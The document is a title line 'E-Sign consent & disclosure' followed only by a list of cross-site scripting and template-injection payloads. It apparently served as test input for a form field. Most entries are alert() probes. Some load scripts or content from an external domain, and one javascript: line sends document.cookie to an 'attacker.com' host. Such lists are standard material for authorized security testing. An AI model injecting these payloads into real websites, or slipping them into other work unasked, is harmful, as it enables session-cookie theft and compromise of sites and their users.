E-Sign consent & disclosure
<script>alert('XSS')</script><script>alert('XSS')</script>
<script>$.getScript('http://external-domain.com')</script>
<script>Object.prototype.attrs = {src:1}; Object.prototype.src='http://external-domain.com'</script>
</script><script>alert('XSS')</script>
<svg xmlns="http://www.w3.org/2000/svg" onload="alert('XSS')"/>
<svg><script>alert('XSS')</script></svg>
<svg onload=alert(1)>
<img src=x onerror=alert('XSS')>
<img src='http://external-domain.com'>
<img src='//external-domain.com'>
"><img src='http://external-domain.com'>
"><img src='//external-domain.com'>
" onclick="alert(1)
' class='test' x='
' onfocus='alert(1)' autofocus x='
' style='x:expression(alert(1))' x='
javascript:alert(document.domain)
javascript:alert(1)
javascript:fetch('http://attacker.com?c='+document.cookie)
" onmouseover="alert(1)
" autofocus onfocus="alert(1)
" style="color:red" onmouseover="alert(1)
<div style="background:url(javascript:alert(1))">
<iframe SRC="http://external-domain.com">
<iframe srcdoc="<script>alert(1)</script>">
<embed src="javascript:alert(1)">
<object data="javascript:alert(1)">
{{constructor.constructor('alert(1)')()}}
${alert(1)}
{{$on.constructor('alert(1)')()}}
{{$eval.constructor('alert(1)')()}}
"; alert(1); var x="
'; alert(1); //